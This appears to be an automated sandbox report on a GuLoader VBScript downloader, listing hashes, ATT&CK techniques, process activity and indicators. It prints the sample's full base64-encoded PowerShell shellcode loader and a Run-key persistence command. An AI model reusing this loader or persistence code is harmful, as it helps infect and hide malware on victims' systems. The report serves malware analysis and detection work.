guloader | 724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3

General

Target

JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs
Size

727KB
MD5

99a444a2e45d6007e37fb0c2c25e49c4
SHA1

7ab6b11b684243ae587b6eb037cabe98984792ff
SHA256

724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3
SHA512

7398994f927e22cd1bf868436c4645f368cf3439fe00dd836c10d8860ae22c73aa16f4ddd9c6f37053c326d65734d9e6ad1afe73955cc727c7c982b31f6ae69e
SSDEEP

6144:7umfsxtdM+jbYG0XxnHVMYhRANfAD58OAFZ3/g5VCyh9IiwEw6IAl:uoQYhiNft+wErIe

Score

10^/10

guloader defense_evasion discovery downloader persistence

Malware Config

Signatures

Guloader family
guloader
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bulningssaarer = "%Mija% -w 1 $Kvstendediplom=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Medsammensvornest;%Mija% -encodedcommand($Kvstendediplom)"	ieinstal.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	drive.google.com
21	drive.google.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1140	ieinstal.exe
1140	ieinstal.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1800	powershell.exe
1140	ieinstal.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1800 set thread context of 1140	1800	powershell.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ieinstal.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1800	powershell.exe
1800	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1800	powershell.exe
1800	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1800	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1140	ieinstal.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3656 wrote to memory of 1800	3656	WScript.exe	85
PID 3656 wrote to memory of 1800	3656	WScript.exe	85
PID 3656 wrote to memory of 1800	3656	WScript.exe	85
PID 1800 wrote to memory of 3184	1800	powershell.exe	87
PID 1800 wrote to memory of 3184	1800	powershell.exe	87
PID 1800 wrote to memory of 3184	1800	powershell.exe	87
PID 3184 wrote to memory of 4520	3184	csc.exe	88
PID 3184 wrote to memory of 4520	3184	csc.exe	88
PID 3184 wrote to memory of 4520	3184	csc.exe	88
PID 1800 wrote to memory of 4888	1800	powershell.exe	96
PID 1800 wrote to memory of 4888	1800	powershell.exe	96
PID 1800 wrote to memory of 4888	1800	powershell.exe	96
PID 1800 wrote to memory of 1140	1800	powershell.exe	97
PID 1800 wrote to memory of 1140	1800	powershell.exe	97
PID 1800 wrote to memory of 1140	1800	powershell.exe	97
PID 1800 wrote to memory of 1140	1800	powershell.exe	97

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3656
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBIAHkAYQBlAG4AbwBkAG8AbgB0AGQAZQBwAHUAdABlAHIAZQB0AGgAYQBtAHAAZQBmAHIAcwAgAFMAdQBiAHMAdABpAHQAdQByAG0AaQBzAGcAcgBhAGQAZQAgAFQAbQBtAGUAcgBmAGwAYQBhAGQAZQByAHMAcwBwAGEAdAB0AGkAbgBnAHUAZABzACAAQQByAGkAbABlAGQAbABhAGQAaQBmAGkAZQBkAHQAaQBsAGcAYQBuAGcAIABHAHIAdQBuAGQAdABvAG4AZQBzAG0AaQB0AHMAdQBtAGEAdABhAHAAcgBlAGMAZQBuACAAbwByAGcAYQBuAGkAcwBhAHQAaQBvAG4AZQByAG4AZQBzAHMAIABNAGUAdABoAG8AbABqAHUAZABlAGEAbgBpAG4AZABvAHIAZABuAGkAbgBnAG0AbwBuAG8AdAB5AHAAIABCAGUAZgBvAGwAawBuAGkAbgBnAHMAcwB1AG4AZABoAGUAZABlAG4AZgBvAHIAdQBkAGIAZQAgAEMAYQByAGEAbQBlAGwAaQBuAHAAdQB0AHQAbwBvAG0AbwBuAG8AcABsAG8AaQAgAEQAcgBuAGkAbgBnAGUAcgBzAGEAcABzAGkAZABhAGwAbAAgAFQAYQBtAHAAbwBuAGEAZABlAG4AcwB0AHIAaQBiACAAUwBvAGsAawBlAGYAZABkAGUAcgBzAHUAbABhAHMAdABlAGwAaQBnAGgAZQBkAHMAbwB2AGUAcgBoAG8AIABCAGEAcgBuAGEAZwB0AGkAZwBoAGUAZABlAHIAbgBlAGMAYQBnAGkAZQAgAEwAYQBuAGQAcwBmAG8AcgBlAG4AaQBuAGcAcwBuAG8AIAANAAoAJABSAHUAbQBmAGEAcgB0AHMAYwBlAG4AdAByAGUAcwB2AGkAcgBrADAAIAA9ACAAIgBOACIAKwAiAHQAIgArACIAQQBsAGwAIgArACIAbwBjAGEAdABlACIAKwAiAFYAaQByAHQAIgArACIAdQBhAGwAIgArACIATQBlAG0AIgArACIAbwByAHkAIgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAaQB2AHkAdwBvAG8AZAByAGUAdABvAHIAdABvAHYAbgBlAG4AYwBoAGUAZQBjAGgAYQBmAGkAbABtADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoAGkAbgB0ACAAdgBhAHIAMQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABTAGEAbQBsAGUAdgBlAHIAcwBrAGUAbgBzAGsAcgAxACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGEAbQBsAGUAdgBlAHIAcwBrAGUAbgBzAGsAcgAyACwAaQBuAHQAIABTAGEAbQBsAGUAdgBlAHIAcwBrAGUAbgBzAGsAcgAzACkAOwANAAoADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHcAaQBuAG0AbQAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAdABpAG0AZQBCAGUAZwBpAG4AUABlAHIAaQBvAGQAKABpAG4AdAAgAHYAYQByADEAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACwAIABFAG4AdAByAHkAUABvAGkAbgB0AD0AIgAkAFIAdQBtAGYAYQByAHQAcwBjAGUAbgB0AHIAZQBzAHYAaQByAGsAMAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEMAbwByAGUAMQAoAGkAbgB0ACAAaQB2AHkAdwBvAG8AZAByAGUAdABvAHIAdABvAHYAbgBlAG4AYwBoAGUAZQBjAGgAYQBmAGkAbABtADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbwByAGYAaQBsAG0AZQBuAGUAcwByAGUAawBuAG8AYwBrAHIAZQBwAHIAbwBkAHUAYwAsAGkAbgB0ACAAUwBhAG0AbABlAHYAZQByAHMAawBlAG4AcwBrAHIALAByAGUAZgAgAEkAbgB0ADMAMgAgAGkAdgB5AHcAbwBvAGQAcgBlAHQAbwByAHQAbwB2AG4AZQBuAGMAaABlAGUAYwBoAGEAZgBpAGwAbQAsAGkAbgB0ACAAUgB1AG0AZgBhAHIAdABzAGMAZQBuAHQAcgBlAHMAdgBpAHIAawAsAGkAbgB0ACAAaQB2AHkAdwBvAG8AZAByAGUAdABvAHIAdABvAHYAbgBlAG4AYwBoAGUAZQBjAGgAYQBmAGkAbABtADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAARwBlAHQASQBDAE0AUAByAG8AZgBpAGwAZQAoAGkAbgB0ACAAdgBhAHIAMQAsAGkAbgB0ACAAdgBhAHIAMgAsAGkAbgB0ACAAdgBhAHIAMwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEcAZQB0AFMAdAByAGkAbgBnAFQAeQBwAGUARQB4ACgAaQBuAHQAIAB2AGEAcgAxACwAaQBuAHQAIAB2AGEAcgAyACwAaQBuAHQAIAB2AGEAcgAzACwAaQBuAHQAIAB2AGEAcgA0ACwAaQBuAHQAIAB2AGEAcgA1ACkAOwANAAoADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAASQBzAFIAZQBjAHQARQBtAHAAdAB5ACgAaQBuAHQAIAB2AGEAcgAxACkAOwANAAoADQAKAA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABTAGEAbQBsAGUAdgBlAHIAcwBrAGUAbgBzAGsAcgA1ACwAaQBuAHQAIABTAGEAbQBsAGUAdgBlAHIAcwBrAGUAbgBzAGsAcgA2ACkAOwANAAoADQAKAA0ACgB9AA0ACgAiAEAADQAKACMARABlAG0AdQByAHMAdABlAGsAbgBvAGwAbwBnAGkAcwBrAGUAcwBuAGQAZQAgAE0AbwB0AGgAZQByAGwAZQBzAHMAaABvAHQAZQBsAHYAcgBlAGwAcwBlACAAWQBhAGwAbABhAGUAcgB1AGQAZQBsAGUAbABpAGcAdABhACAASwB2AGEAcgB0AGUAcgByAGEAcABwAG8AcgB0AGUAcgBzAHMAdgBlAGwAbgBpAG4AZwAgAEYAaQBiAGUAcgBnAGwAYQBzAHMAZQB0AHMAZgByAGkAcwBrAGUAcgAgAFQAcgBzAG4AaQB0AHMAdQBuAGEAcwBzAG8AYwBpAGEAdABpAHYAZQBjAGgAbwAgAFAAbwBzAHQAcABhAHQAZQBsAGwAYQByAHQAZQAgAFIAYQBnAHQAbwBwAHMAawByAG0AaABhAGEAbgBkAHQAZQByAGkAbgBnAGUAcgBuAGUAdAByAGwAIABTAGUAbQBpAHAAcgBvAGcAcgBlAHMAcwBpAHYAZQBsAHkAdQAgAG0AYQBuAGQAZQB0AGkAbQBlAHIAbgBlAHMAbABlAHoAZwB5AHAAcwB1ACAAVQBuAGQAZQByAG0AZQBuAG4AZQBzAGsAZQBiAHIAYQBjAHQAbABlAHQAdABhAHAAcwB0AGUAcgBsAHkAIABDAGgAYQB1AGMAaABhAHQAcgBlAHYAZQByAGUAbgAgAEwAcwBlAGgAYQBzAHQAaQBnAGgAZQBkAGUAbgBzAGQAdgByAGcAYgBpAHIAawBlAHMAYQBiAGEAbgAgAFMAdABlAG4AcgBrAGUAbgBlAG4AYQBjAGMAZQBzAHMAaQBvAG4AcwBlAGoAYQBrAHUAbABhAHQAaQBvACAATQBpAG4AbgBlAHMAbwB0AGEAYgBhAHMAaQBsAGkAIABIAHUAZABmAGwAZQB0AG4AaQBuAGcAZQByAG4AZQBzAGwAaQBnAGgAdABuAGkAbgBnAHAAIABOAGEAdABhAGwAaQB0AHkAcgBhAHQAaQBvAG4AYQBsAGkAIABCAGoAcgBuAGUAbABhAGIAbQBhAHMAYwB1AGwAaQBuAGUAcwBuAG8AIABBAGYAdgBpAHMAZQByAG4AZQBzAHUAbgBpAG4AdAByAG8AZAB1AGMAdABvAHIAeQBmAG8AcgAgAEEAcgBpAGEAZABuAGUAdAByAGEAYQBkAGUAcwBiAGwAYQBuAGMAaABlAHIAaQBuAGcAZQBuACAAQgByAGkAYgBlAHIAcwB0AGEAbgBkAGEAcgBkAGkAcwBlACAAUAByAG8AcABpAHQAaQBvAHUAcwBsAHkAaQBuAGUAeABwAHIAZQBzAHMAYwBlAG4AdAAgAFAAbwBsAGwAaQBuAGkAZgBlAHIAbwB1AHMAdABvACAASwBhAHAAZQBsAHAAbwBzAHQAcwBjAHUAdABlAGwAbABhAGkAcgByAGUAcwBwAG8AbgBzAGkAYgBsAGUAIABTAHUAcABlAHIAdQByAGcAZQBuAHQAbAB5AHIAZQBzAHUAbgBkAGYAZQByAGkAZQBnAG8AIABIAGUAbgBuAGkAbgBnAHMAYgBlAGcAbABvAGIAIABUAGEAcgByAGUAcgBhAG4AZwByAGUAYgBzAHAAdQBuAGsAdABzAGUAawBzACAAQgB1AGMAaABpAHQAZQBwAGkAbABlAHIAZwByAHUAdABjAGgAcABsAHUAbQBjAG8AdABzAHAAeQAgAHEAdQBhAHMAcwBlAHgAdAByAGEAdABlAGwAbAB1AHIAaQBhAG4AZQBsAGUAYwB0AHIAbwBkAGkAYQBsACAAUwBtAHUAZwBsAGUAcgBlAG4AcwBtAGEAdAByAGkAcABvAHQAIAB1AG4AcwBhAHcAbgBwAGkAZQB0AGUAcgBzAGEAbgBnAGkAcgBpAG4AaABhAGIAaQB0AGEAdABpAG8AbgAgAFIAaQBkAHMAZQBuAGUAaAB1AG4AZABlAHMAdgAgAFMAdAByAGEAZgBhAGYAcwBvAG4AZQByAHMAdQBpAGcAZQBuAG4AZQBtAHMAawB1AGUAbABpAGcAIAAgAA0ACgAkAGkAdgB5AHcAbwBvAGQAcgBlAHQAbwByAHQAbwB2AG4AZQBuAGMAaABlAGUAYwBoAGEAZgBpAGwAbQAzAD0AMAA7AA0ACgAkAGkAdgB5AHcAbwBvAGQAcgBlAHQAbwByAHQAbwB2AG4AZQBuAGMAaABlAGUAYwBoAGEAZgBpAGwAbQA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAGkAdgB5AHcAbwBvAGQAcgBlAHQAbwByAHQAbwB2AG4AZQBuAGMAaABlAGUAYwBoAGEAZgBpAGwAbQA4AD0AWwBpAHYAeQB3AG8AbwBkAHIAZQB0AG8AcgB0AG8AdgBuAGUAbgBjAGgAZQBlAGMAaABhAGYAaQBsAG0AMQBdADoAOgBDAG8AcgBlADEAKAAtADEALABbAHIAZQBmAF0AJABpAHYAeQB3AG8AbwBkAHIAZQB0AG8AcgB0AG8AdgBuAGUAbgBjAGgAZQBlAGMAaABhAGYAaQBsAG0AMwAsADAALABbAHIAZQBmAF0AJABpAHYAeQB3AG8AbwBkAHIAZQB0AG8AcgB0AG8AdgBuAGUAbgBjAGgAZQBlAGMAaABhAGYAaQBsAG0AOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAkAGIAcgBrAGQAZQBsAGUAbgBlAHMAZQBmAHQAZQByAGcAaQB2AGUAdABuAD0AKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABUAGEAbAB0AGUAcwBhAGYAdABlAG4AYgBuAG4AZQBuAHMAcAByAG0AaQBlAGwAYQBhAG4AcwBjAHUAIgApAC4AVQBuAHMAYQBsAGwAeQBpAG4AZwByAGUAYgBlAGwAbABpAG8AbgBuAG8AbgBlAA0ACgANAAoAJABVAGQAdAB5AGQAZQB0AHIAbwB0AGgAawBvAG0AZQBsAG8AZAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAXQAsACQAYgByAGsAZABlAGwAZQBuAGUAcwBlAGYAdABlAHIAZwBpAHYAZQB0AG4ALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkADQAKAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGIAcgBrAGQAZQBsAGUAbgBlAHMAZQBmAHQAZQByAGcAaQB2AGUAdABuAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAA0ACgAJAHsADQAKACAAIAAgACAAIAAgACAAIAAkAFUAZAB0AHkAZABlAHQAcgBvAHQAaABrAG8AbQBlAGwAbwBkAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAYgByAGsAZABlAGwAZQBuAGUAcwBlAGYAdABlAHIAZwBpAHYAZQB0AG4ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQANAAoAIAAgACAAIAB9AA0ACgANAAoADQAKAGYAbwByACgAJABLAGUAZwBsAGUAZgBsAGEAZABlAHIAbgBlAGUAdABoAG4AbwBnAHIAYQBwAGgAPQAwADsAIAAkAEsAZQBnAGwAZQBmAGwAYQBkAGUAcgBuAGUAZQB0AGgAbgBvAGcAcgBhAHAAaAAgAC0AbAB0ACAAJABVAGQAdAB5AGQAZQB0AHIAbwB0AGgAawBvAG0AZQBsAG8AZAAuAGMAbwB1AG4AdAAgADsAIAAkAEsAZQBnAGwAZQBmAGwAYQBkAGUAcgBuAGUAZQB0AGgAbgBvAGcAcgBhAHAAaAArACsAKQANAAoAewANAAoACQANAAoAWwBpAHYAeQB3AG8AbwBkAHIAZQB0AG8AcgB0AG8AdgBuAGUAbgBjAGgAZQBlAGMAaABhAGYAaQBsAG0AMQBdADoAOgBSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgAJABpAHYAeQB3AG8AbwBkAHIAZQB0AG8AcgB0AG8AdgBuAGUAbgBjAGgAZQBlAGMAaABhAGYAaQBsAG0AMwArACQASwBlAGcAbABlAGYAbABhAGQAZQByAG4AZQBlAHQAaABuAG8AZwByAGEAcABoACwAWwByAGUAZgBdACQAVQBkAHQAeQBkAGUAdAByAG8AdABoAGsAbwBtAGUAbABvAGQAWwAkAEsAZQBnAGwAZQBmAGwAYQBkAGUAcgBuAGUAZQB0AGgAbgBvAGcAcgBhAHAAaABdACwAMQApAA0ACgANAAoAfQANAAoAWwBpAHYAeQB3AG8AbwBkAHIAZQB0AG8AcgB0AG8AdgBuAGUAbgBjAGgAZQBlAGMAaABhAGYAaQBsAG0AMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGkAdgB5AHcAbwBvAGQAcgBlAHQAbwByAHQAbwB2AG4AZQBuAGMAaABlAGUAYwBoAGEAZgBpAGwAbQAzACwAIAAwACkADQAKAA0ACgA="
  2⤵
  - Checks QEMU agent file
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1800
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u4fjzatq\u4fjzatq.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3184
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD9F5.tmp" "c:\Users\Admin\AppData\Local\Temp\u4fjzatq\CSC909CC0D8DC84E58B0BDAC9CE5DFC42.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4520
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
    3⤵
    PID:4888
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
    3⤵
    - Checks QEMU agent file
    - Adds Run key to start application
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD9F5.tmp

Filesize
1KB

MD5
deae102fc8e6aeb3ca57329bb7776828

SHA1
d2694443615caa067a6c4d4cdc0ff17922700740

SHA256
32f09639dcb582c287af0f1bfd6df0534961263a7a244ed525db7b82aa7546b1

SHA512
16231d53c7d5e642d513b4a2c715af2a141ef9fe7e7a070b69033fe4ec9fd57fc677a10ac21c995c4639f58775e488c4736c2b65c4106f035a42302a60871786

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyanvwda.52s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\u4fjzatq\u4fjzatq.dll

Filesize
4KB

MD5
4171f500478b469c653103cad022c6d3

SHA1
909ef5b4d87a085674c511aff2ab91ceba04ec10

SHA256
54bf7ae875df2827f4ffa42fc21c14c422d7e6dc21d580ebb1db24b134d2fced

SHA512
c5f17d8800bc3f80bcf4129e411785a43767124d653380bead626cd39ea0cd59cea332a3b3e1bdfcd5e4c527768deb59a57c300f19497e54f64f637757aedc84

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\u4fjzatq\CSC909CC0D8DC84E58B0BDAC9CE5DFC42.TMP

Filesize
652B

MD5
5a1767ca634c1e3777cd9c8485ee989e

SHA1
7408056320b2c455fbb954f6b7c98d2f347ee850

SHA256
8a063312bee6cc9bf136048b0edc9784a1f24de6faf68246cd96141843b61c5b

SHA512
98d01a2fecbf6af9a4f94c669659953e831a9fb52b9ad7dfee4d27bb803e068ea1ef72e3735256bea07d08a14d5a3b00df8f2424668b1e56c7d75df0f3b2ce44

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\u4fjzatq\u4fjzatq.0.cs

Filesize
1KB

MD5
fd01bdbcce0a28e44e23fd48d27fecb3

SHA1
e601c783d5852bec3efdb1c2bac13b5e0c65f2a2

SHA256
c0fef30f1c5beaa723a8f20f8f728ae7f5241cffed7ba54e792b32500ae7d20d

SHA512
0a2978a4a22b75f871b70f7e86cfc8d92b9b314f86396ceb995f254d16ad85303fa0a6236a2e2308b23fbe16edbfbe8c9ac5b63d2daeb171d1126e97a6b21a69

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\u4fjzatq\u4fjzatq.cmdline

Filesize
369B

MD5
2e11df4149ad619c6045e6c0c5901e07

SHA1
4f590a89dc3bcbbe58fd509d1eec5378b77bbcf6

SHA256
fbdfafc7eeabd93198e68c5e7a465ec2a542e8946731717155b5db0fd820aaf6

SHA512
04e53c6580ddd0535a64d6f4dae66b6998855591fa72098e1fe5f0d4cd74a7514e3793529b99c6935f232b9f3eaffad65c2548bb2c769a28151e254618434785

Download Submit
memory/1140-59-0x0000000000C00000-0x0000000000D00000-memory.dmp

Filesize
1024KB

Download
memory/1140-58-0x0000000000C00000-0x0000000000D00000-memory.dmp

Filesize
1024KB

Download
memory/1140-57-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/1140-42-0x0000000000C00000-0x0000000000D00000-memory.dmp

Filesize
1024KB

Download
memory/1800-6-0x0000000005B70000-0x0000000005BD6000-memory.dmp

Filesize
408KB

Download
memory/1800-37-0x0000000007670000-0x0000000007692000-memory.dmp

Filesize
136KB

Download
memory/1800-20-0x0000000007BC0000-0x000000000823A000-memory.dmp

Filesize
6.5MB

Download
memory/1800-21-0x0000000006880000-0x000000000689A000-memory.dmp

Filesize
104KB

Download
memory/1800-18-0x0000000006360000-0x000000000637E000-memory.dmp

Filesize
120KB

Download
memory/1800-17-0x0000000005D10000-0x0000000006064000-memory.dmp

Filesize
3.3MB

Download
memory/1800-0-0x0000000074D8E000-0x0000000074D8F000-memory.dmp

Filesize
4KB

Download
memory/1800-7-0x0000000005BE0000-0x0000000005C46000-memory.dmp

Filesize
408KB

Download
memory/1800-5-0x0000000005AD0000-0x0000000005AF2000-memory.dmp

Filesize
136KB

Download
memory/1800-34-0x0000000006900000-0x0000000006908000-memory.dmp

Filesize
32KB

Download
memory/1800-36-0x00000000076E0000-0x0000000007776000-memory.dmp

Filesize
600KB

Download
memory/1800-19-0x0000000006380000-0x00000000063CC000-memory.dmp

Filesize
304KB

Download
memory/1800-38-0x00000000087F0000-0x0000000008D94000-memory.dmp

Filesize
5.6MB

Download
memory/1800-39-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/1800-41-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/1800-40-0x0000000074D8E000-0x0000000074D8F000-memory.dmp

Filesize
4KB

Download
memory/1800-4-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/1800-43-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/1800-3-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download
memory/1800-2-0x00000000054A0000-0x0000000005AC8000-memory.dmp

Filesize
6.2MB

Download
memory/1800-1-0x0000000004D80000-0x0000000004DB6000-memory.dmp

Filesize
216KB

Download
memory/1800-60-0x0000000074D80000-0x0000000075530000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

